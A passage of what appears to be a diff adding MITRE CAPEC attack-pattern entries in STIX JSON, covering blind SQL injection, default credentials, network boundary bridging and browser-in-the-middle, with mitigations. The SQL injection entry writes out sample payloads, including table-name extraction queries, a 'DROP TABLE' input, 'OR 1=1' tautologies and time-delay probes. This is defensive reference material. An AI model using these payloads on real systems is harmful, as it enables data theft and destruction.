If the result is the same as when the adversary entered \"username\" in the field, then the adversary knows that the application is vulnerable to SQL Injection. The adversary can then ask yes/no questions from the database server to extract information from it. For example, the adversary can extract table names from a database using the following types of queries:\n \"username' AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108\".\n If the above query executes properly, then the adversary knows that the first character in a table name in the database is a letter between m and z. If it doesn't, then the adversary knows that the character must be between a and l (assuming of course that table names only contain alphabetic characters). By performing a binary search on all character positions, the adversary can determine all table names in the database. Subsequently, the adversary may execute an actual attack and send something like:\n \"username'; DROP TABLE trades; --\n ", + "In the PHP application TimeSheet 1.1, an adversary can successfully retrieve username and password hashes from the database using Blind SQL Injection. If the adversary is aware of the local path structure, the adversary can also remotely execute arbitrary code and write the output of the injected queries to the local path. Blind SQL Injection is possible since the application does not properly sanitize the $_POST['username'] variable in the login.php file. See also: CVE-2006-4705" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. [Hypothesize SQL queries in application]Generated hypotheses regarding the SQL queries in an application. For example, the adversary may hypothesize that their input is passed directly into a query that looks like:\n \"SELECT * FROM orders WHERE ordernum = _____\"or\"SELECT * FROM orders WHERE ordernum IN (_____)\"or\"SELECT * FROM orders WHERE ordernum in (_____) ORDER BY _____\"\n Of course, there are many other possibilities.\n

  2. Techniques
    Research types of SQL queries and determine which ones could be used at various places in an application.
  3. [Determine how to inject information into the queries]Determine how to inject information into the queries from the previous step such that the injection does not impact their logic. For example, the following are possible injections for those queries:\n \"5' OR 1=1; --\"and\"5) OR 1=1; --\"and\"ordernum DESC; --\"\n

  4. Techniques
    Add clauses to the SQL queries such that the query logic does not change.
    Add delays to the SQL queries in case server does not provide clear error messages (e.g. WAITFOR DELAY '0:0:10' in SQL Server or BENCHMARK(1000000000,MD5(1) in MySQL). If these can be injected into the queries, then the length of time that the server takes to respond reveals whether the query is injectable or not.

Experiment

  1. Determine user-controllable input susceptible to injection: Determine the user-controllable input susceptible to injection. For each user-controllable input that the adversary suspects is vulnerable to SQL injection, attempt to inject the values determined in the previous step. If an error does not occur, then the adversary knows that the SQL injection was successful.

  2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.
  3. Determine database type: Determines the type of the database, such as MS SQL Server or Oracle or MySQL, using logical conditions as part of the injected queries

  4. Techniques
    Try injecting a string containing char(0x31)=char(0x31) (this evaluates to 1=1 in SQL Server only)
    Try injecting a string containing 0x313D31 (this evaluates to 1=1 in MySQL only)
    Inject other database-specific commands into input fields susceptible to SQL Injection. The adversary can determine the type of database that is running by checking whether the query executed successfully or not (i.e. whether the adversary received a normal response from the server or not).

Exploit

  1. Extract information about database schema: Extract information about database schema by getting the database to answer yes/no questions about the schema.

  2. Techniques
    Automatically extract database schema using a tool such as Absinthe.
    Manually perform the blind SQL Injection to extract desired information about the database schema.
  3. Exploit SQL Injection vulnerability: Use the information obtained in the previous steps to successfully inject the database in order to bypass checks or modify, add, retrieve or delete data from the database

  4. Techniques
    Use information about how to inject commands into SQL queries as well as information about the database schema to execute attacks such as dropping tables, inserting records, etc.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "SQL queries used by the application to store, retrieve or modify data.", + "User-controllable input that is not properly validated by the application as part of SQL queries." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Determining the database type and version, as well as the right number and type of parameters to the query being injected in the absence of error messages requires greater skill than reverse-engineering database error messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Security by Obscurity is not a solution to preventing SQL Injection. Rather than suppress error messages and exceptions, the application must handle them gracefully, returning either a custom error page or redirecting the user to a default page, without revealing any information about the database or the application internals.", + "id": "course-of-action--b126246b-e773-4c81-af2f-40d1dcfb2160", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-7-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8e7946c-f260-48f6-8601-b5bd6d149921", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b126246b-e773-4c81-af2f-40d1dcfb2160", + "target_ref": "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269", + 
"type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8e9617f-1737-408d-9e05-97402a6101c9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "target_ref": "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may try certain common or default usernames and passwords to gain access into the system and perform unauthorized actions. An adversary may try an intelligent brute force using empty passwords, known vendor default credentials, as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. 
\"secret\" or \"password\") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.", + "external_references": [ + { + "external_id": "CAPEC-70", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/70.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-798", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/798.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Valid Accounts:Default Accounts", + "external_id": "T1078.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1078/001" + }, + { + "description": "Corporate IoT – a path to intrusion, 2019--10---05, Microsoft Security Response Center (MSRC)", + "external_id": "REF-572", + "source_name": "reference_from_CAPEC", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion" + }, + { + "description": "Risks of Default Passwords on the Internet, 2016--10---07, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-574", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA13-175A" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project 
(OWASP)", + "external_id": "REF-596", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-597", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials.html" + } + ], + "id": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Try Common or Default Usernames and Passwords", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user sets their password to \"123\" or intentionally leaves their password blank. If the system does not have password strength enforcement against a sound password policy, this password may be admitted. 
Passwords like these two examples are two simple and common passwords that are easily able to be guessed by the adversary.", + "Cisco 2700 Series Wireless Location Appliances (version 2.1.34.0 and earlier) have a default administrator username \"root\" with a password \"password\". This allows remote attackers to easily obtain administrative privileges. See also: CVE-2006-5288", + "In April 2019, adversaries attacked several popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. An investigation conducted by the Microsoft Security Resposne Center (MSRC) discovered that these devices were used to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer’s passwords and in the third instance the latest security update had not been applied to the device. [REF-572]" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system uses one factor password based authentication.The adversary has the means to interact with the system." + ], + "x_capec_resources_required": [ + "Technology or vendor specific list of default usernames and passwords." + ], + "x_capec_skills_required": { + "Low": "An adversary just needs to gain access to common default usernames/passwords specific to the technologies used by the system. Additionally, a brute force attack leveraging common passwords can be easily realized if the user name is known." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Delete all default account credentials that may be put in by the product vendor.", + "id": "course-of-action--a5bb8adb-a8f3-466a-af09-898ca2b29b74", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-70-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5ae690da-8edd-49c2-92c4-8f09f6f23cd6", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a5bb8adb-a8f3-466a-af09-898ca2b29b74", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ac1c094b-9c14-4717-9353-911a46460f08", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fcdf171c-f44d-4397-8365-c74fb76197ea", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--67382257-6794-48ac-82a0-f33260b6f0db", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3139771b-b483-4f77-b9ab-79ab1c9eafbe", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb36d937-986b-43eb-aa65-3e773af8ce32", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary which has gained elevated access to network boundary devices may use these devices to create a channel to bridge trusted and untrusted networks. 
Boundary devices do not necessarily have to be on the network’s edge, but rather must serve to segment portions of the target network the adversary wishes to cross into.", + "external_references": [ + { + "external_id": "CAPEC-700", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/700.html" + }, + { + "description": "Network Boundary Bridging", + "external_id": "T1599", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1599" + }, + { + "description": "CISA, Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices, 2018--04---16", + "external_id": "REF-746", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/uscert/ncas/alerts/TA18-106A" + } + ], + "id": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Network Boundary Bridging", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Alter Execution Logic", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Alter Execution Logic", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n In November 2016, a Smart Install Exploitation Tool was released online which takes advantage of Cisco’s unauthenticated SMI management protocol to download a target’s current configuration files. Adversaries can use this tool to overwrite files to modify the device configurations, or upload maliciously modified OS or firmware to enable persistence. 
Once the adversary has access to the device’s configurations, they could modify it to redirect network traffic through other network infrastructure.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify potential targets: An adversary identifies network boundary devices that can be compromised.

  2. Techniques
    The adversary traces network traffic to identify which devices the traffic flows through. Additionally, the adversary can identify devices using fingerprinting methods or locating the management page to determine identifying information about the device.

Experiment

  1. Compromise targets: The adversary must compromise the identified targets in the previous step.

  2. Techniques
    Once the device is identified, the adversary can attempt to input known default credentials for the device to gain access to the management console.
    Adversaries with sufficient identifying knowledge about the target device can exploit known vulnerabilities in network devices to obtain administrative access.

Exploit

  1. Bridge Networks: The adversary changes the configuration of the compromised network device to connect the networks the device was segmenting. Depending on the type of network boundary device and its capabilities, bridging can be implemented using various methods.

  2. Techniques
    The adversary can abuse Network Address Translation (NAT) in firewalls and routers to manipulate traffic flow to their own design. With control of the network device, the adversary can manipulate NAT by either using existing configurations or creating their own to allow two previously unconnected networks to communicate.
    Some network devices can be configured to become a proxy server. Adversaries can set up or exploit an existing proxy server on compromised network devices to create a bridge between separate networks.
", + "x_capec_extended_description": "\n Network boundary devices are network devices such as routers and firewalls which segment networks by restricting certain types of traffic from flowing through the device. Network boundary devices are often directly accessible through a portal page for management purposes. An adversary’s goal when conducting network boundary bridging is to connect networks which are being segmented by the device. To do so, the adversary must first compromise the network boundary device.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have control of a network boundary device." + ], + "x_capec_resources_required": [ + "The adversary requires either high privileges or full control of a boundary device on a target network." + ], + "x_capec_skills_required": { + "Medium": "The adversary must understand how to manage the target network device to create or edit policies which will bridge networks." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure network devices are storing credentials in encrypted stores", + "id": "course-of-action--48c7eeb6-15ae-4cec-83c9-43893ab87cc2", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6685710a-ae92-409d-b90b-bf42d99ddf9e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--48c7eeb6-15ae-4cec-83c9-43893ab87cc2", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Follow the principle of least privilege and restrict administrative duties to as few accounts as possible. Ensure these privileged accounts are secured with strong credentials which do not overlap with other network devices.", + "id": "course-of-action--a94e0345-2aae-474c-96d1-4ee3ce4403b5", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0499645-0b5a-4a77-a9aa-5a9898a56cda", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a94e0345-2aae-474c-96d1-4ee3ce4403b5", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: When possible, configure network boundary devices to use MFA.", + "id": "course-of-action--b8b5187b-5902-4526-9261-21ee49698185", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e16116d-adb8-4e42-9ede-f06f91cc6e40", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8b5187b-5902-4526-9261-21ee49698185", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Change the default configuration for network devices to harden their security profiles. Default configurations are often enabled with insecure features to allow ease of installation and management. However, these configurations can be easily discovered and exploited by adversaries.", + "id": "course-of-action--06843957-473e-41d3-a2c0-0546525f4c5a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--18434696-8393-4a65-95db-162c9fcb9da9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--06843957-473e-41d3-a2c0-0546525f4c5a", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform integrity checks on audit logs for network device management and review them to 
identify abnormalities in configurations.", + "id": "course-of-action--f1a43fab-c319-4d3d-a2a8-4c43e0ddaa95", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--089719e2-cc34-4f35-8302-12fd80decb91", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1a43fab-c319-4d3d-a2a8-4c43e0ddaa95", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Prevent network boundary devices from being physically accessed by unauthorized personnel to prevent tampering.", + "id": "course-of-action--d9a1e293-f73e-4dd1-b0b2-391632fec089", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4272c85c-323b-48c9-a816-4a446c85026f", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9a1e293-f73e-4dd1-b0b2-391632fec089", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
"2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits the inherent functionalities of a web browser, in order to establish an unnoticed remote desktop connection in the victim's browser to the adversary's system. The adversary must deploy a web client with a remote desktop session that the victim can access.", + "external_references": [ + { + "external_id": "CAPEC-701", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/701.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "description": "Tommasi F., Catalano, C., Taurino I., Browser-in-the-Middle (BitM) attack, 2021--04---17", + "external_id": "REF-747", + "source_name": "reference_from_CAPEC", + "url": "https://link.springer.com/article/10.1007/s10207-021-00548-5#citeas" + } + ], + "id": "attack-pattern--cd6af290-f89e-4238-95b3-6f06d05ed814", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Browser in the Middle (BiTM)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify potential targets: The adversary identifies an application or service that the target is likely to use.

  2. Techniques
    The adversary stands up a server to host the transparent browser and entices victims to use it by using a domain name similar to the legitimate application. In addition to the transparent browser, the adversary could also install a web proxy, sniffer, keylogger, and other tools to assist in their goals.

Experiment

  1. Lure victims: The adversary crafts a phishing campaign to lure unsuspecting victims into using the transparent browser.

  2. Techniques
    An adversary can create a convincing email with a link to download the web client and interact with the transparent browser.

Exploit

  1. Monitor and Manipulate Data: When the victim establishes the connection to the transparent browser, the adversary can view victim activity and make alterations to what the victim sees when browsing the web.

  2. Techniques
    Once a victim has established a connection to the transparent browser, the adversary can use installed tools such as a web proxy, keylogger, or additional malicious browser extensions to gather and manipulate data or impersonate the victim.
", + "x_capec_extended_description": "\n Unlike Adversary in the Browser, the victim does not need to install a malicious application. Browser in the Middle uses the inherent functionalities of a web browser to convince the victim they are browsing normally under the assumption that the connection is secure. All the actions performed by the victim in the open window are actually performed on the machine of the adversary. These victim-authenticated sessions are available to the adversary to use. All entered data such as passwords and usernames can be logged by the adversary and the content displayed to the victim can be altered arbitrarily. Varieties of multifactor authentication which rely solely on user input and do not use a form of hardware-based secret exchange are vulnerable to browser in the middle.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must create a convincing web client to establish the connection. The victim then needs to be lured onto the adversary's webpage. In addition, the victim's machine must not use local authentication APIs, a hardware token, or a Trusted Platform Module (TPM) to authenticate." + ], + "x_capec_resources_required": [ + "A web application with a client is needed to enable the victim's browser to establish a remote desktop connection to the system of the adversary." 
+ ], + "x_capec_skills_required": { + "Medium": "" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use strong, mutual authentication to fully authenticate with both ends of any communications channel", + "id": "course-of-action--4d1e1950-0107-428d-bcd1-90b10a8f7261", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-701-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0f73294e-ddd9-4448-b3fe-3de0d2ee4051", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4d1e1950-0107-428d-bcd1-90b10a8f7261", + "target_ref": "attack-pattern--cd6af290-f89e-4238-95b3-6f06d05ed814", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits incorrect chaining or granularity of hardware debug components in order to gain unauthorized access to debug functionality on a chip. 
